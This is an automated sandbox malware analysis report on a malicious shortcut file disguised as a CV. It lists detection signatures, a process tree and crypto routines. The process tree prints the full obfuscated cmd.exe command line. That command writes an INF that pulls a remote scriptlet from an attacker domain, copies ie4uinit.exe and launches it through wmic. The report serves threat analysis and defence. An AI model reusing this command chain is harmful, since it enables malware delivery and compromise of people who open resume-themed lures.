Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CV - David Rolls.lnk

Overview

General Information

Sample Name:CV - David Rolls.lnk
Analysis ID:791689
MD5:ba88702ee0712536390562efecb979ad
SHA1:ef1c4d176780db656217bf33088dba7918acd30b
SHA256:635c496fc044d519146f8e6e94b3d208803a5c2c00065c7e54c04f8276c1d049
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Checks if browser processes are running
Creates processes via WMI
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to create processes via WMI
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
Creates COM task schedule object (often to register a task for autostart)
Found evasive API chain (date check)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Uses the system / local time for branch decision (may execute only at specific dates)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Drops PE files
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • cmd.exe (PID: 724 cmdline: C:\Windows\System32\cmd.exe" /v /c set "Images97=si" && set "Images67=version" && set "Images38=d" && set "Images82=default" && set "Images4=init" && (for %h in (c) do @set "Images7=%~h") && set "Images62=e" && set "Images14=t" && set "Images12=." && (for %k in (a) do @set "Images32=%~k") && set "Images3=History" && call set "Images6=%Images3:~2,1%" && set "Images43=settings" && set "Images8=$w" && set "Images88=!Images12!inf" && set "Images58=ieu!Images4!!Images88!" && call !Images6!et "Images84=%!Images32!ppdata%\micro!Images6!oft\" && !Images6!et "Images00=!Images84!!Images58!" && (for %t in ("[!Images67!]" "signature = !Images8!indows nt$" "[!Images38!e!Images6!tinationdirs]" "C3D81=01" "!Images82!destdir=11" "[C3D81]" "ieu%Images15%!Images88!" "[FD48E1]" "sc\" "ro%Images95%j,NI,%Images81%%Images2%%Images2%p%Images66%%Images0%%Images0%davidrolls!Images12!%Images76%/aj55hg3eude" "[!Images82!in!Images6!tall.windows7]" "Un\" "Register\" "OCXs=FD48E1" "!Images38!elfil!Images62!s=C3D81" "[!Images6!!Images14!rings]" "Images2=t;Images26" "!Images6!ervicen!Images32!me=' '" "Images15=!Images4!" "Images27=%time%" "!Images6!hortsvcn!Images32!me=' '" "Images0=/" "Images95=b;Images08" "Images76=com" "Images66=:;Images03" "Images81=h" ) do @e!Images7!ho %~t)>"!Images00!" && !Images6!et "Images20=ie4u!Images4!.!Images62!xe" && call xcopy /Y /C /Q %win!Images38!ir%\!Images6!ystem32\!Images20! "!Images84!*" | set Images21=Strikes && !Images6!t!Images32!rt "" wmi!Images7! proce!Images6!s call !Images7!rea!Images14!e "!Images84!!Images20! -base!Images43!" | set "Images83=Venues Before Travis Crane Language Scientists Creatures Agencies Phases Copper Lands Loops Afraid Soldier Never Mounts Shine Direct Fluid Scene Invitations Ripple Prefers Fiscal Taste Bargains Brussels Feeds Thanks Features Seeks Relax Identify April Victory Limit Resemble Apple Hands Specs Festival Sport Trouble Supporters Erupt Winds Ketchup MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 4132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1792 cmdline: C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • xcopy.exe (PID: 4960 cmdline: xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" MD5: 6BC7DB1465BEB7607CBCBD7F64007219)
    • cmd.exe (PID: 1980 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set Images21=Strikes " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • cmd.exe (PID: 1240 cmdline: C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • WMIC.exe (PID: 4560 cmdline: wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
        • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1308 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set "Images83=Venues Before Travis Crane Language Scientists Creatures Agencies Phases Copper Lands Loops Afraid Soldier Never Mounts Shine Direct Fluid Scene Invitations Ripple Prefers Fiscal Taste Bargains Brussels Feeds Thanks Features Seeks Relax Identify April Victory Limit Resemble Apple Hands Specs Festival Sport Trouble Supporters Erupt Winds Ketchup"" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • ie4uinit.exe (PID: 5736 cmdline: C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings MD5: 9DD77F0F421AA9A70383210706ECA529)
    • ie4uinit.exe (PID: 5056 cmdline: C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache MD5: 9DD77F0F421AA9A70383210706ECA529)
      • rundll32.exe (PID: 1396 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 5944 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: CV - David Rolls.lnkVirustotal: Detection: 9%Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319D7AC8 CertOpenStore,CertFindCertificateInStore,CryptImportPublicKeyInfo,GetLastError,GetLastError,CertFreeCertificateContext,CertCloseStore,9_2_00007FF7319D7AC8
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319D56A4 CryptBinaryToStringA,CryptBinaryToStringA,GetLastError,GetLastError,9_2_00007FF7319D56A4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319DEA9C memcpy_s,CryptCreateHash,CryptHashData,CryptDeriveKey,GetLastError,GetLastError,GetLastError,CryptDestroyHash,GetLastError,GetLastError,GetLastError,9_2_00007FF7319DEA9C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319D763C CryptStringToBinaryW,CryptStringToBinaryW,GetLastError,GetLastError,GetLastError,GetLastError,9_2_00007FF7319D763C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319D25C0 CryptAcquireContextW,CryptReleaseContext,9_2_00007FF7319D25C0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319D7DCC memset,CryptHashCertificate,memcmp,GetLastError,9_2_00007FF7319D7DCC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319DED98 memcpy_s,memcpy_s,CryptGenRandom,memcpy_s,EnterCriticalSection,LeaveCriticalSection,GetLastError,GetLastError,GetLastError,9_2_00007FF7319DED98
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319DE950 CryptImportPublicKeyInfo,GetLastError,GetLastError,GetLastError,CertFreeCertificateContext,CryptGetKeyParam,GetLastError,GetLastError,GetLastError,9_2_00007FF7319DE950
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319D2550 CryptReleaseContext,9_2_00007FF7319D2550
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319D74BC CryptCreateHash,CryptSetHashParam,CryptVerifySignatureW,GetLastError,CryptDestroyKey,GetLastError,CryptDestroyHash,GetLastError,9_2_00007FF7319D74BC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319DF108 CryptSetKeyParam,memcpy_s,CryptEncrypt,memcpy_s,CryptEncrypt,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,9_2_00007FF7319DF108
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319D544C strnlen,isalnum,CryptStringToBinaryA,CryptStringToBinaryA,GetLastError,GetLastError,9_2_00007FF7319D544C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319D73D0 CryptCreateHash,CryptHashData,CryptGetHashParam,GetLastError,CryptDestroyHash,GetLastError,9_2_00007FF7319D73D0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319DEFAC CryptCreateHash,memset,CryptSetHashParam,CryptHashData,CryptGetHashParam,GetLastError,GetLastError,GetLastError,CryptDestroyHash,GetLastError,GetLastError,GetLastError,9_2_00007FF7319DEFAC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319DE80C CryptGenRandom,memcpy_s,CryptEncrypt,GetLastError,GetLastError,GetLastError,GetLastError,9_2_00007FF7319DE80C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319DEBE0 CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_00007FF7319DEBE0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319DE750 CryptAcquireContextW,GetLastError,GetLastError,GetLastError,9_2_00007FF7319DE750
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeCode function: 9_2_00007FF7319D2B50 CryptGenRandom,GetLastError,SysFreeString,9_2_00007FF7319D2B50
Source: Binary string: ie4uinit.pdbGCTL source: xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr
Source: Binary string: ie4uinit.pdb source: xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr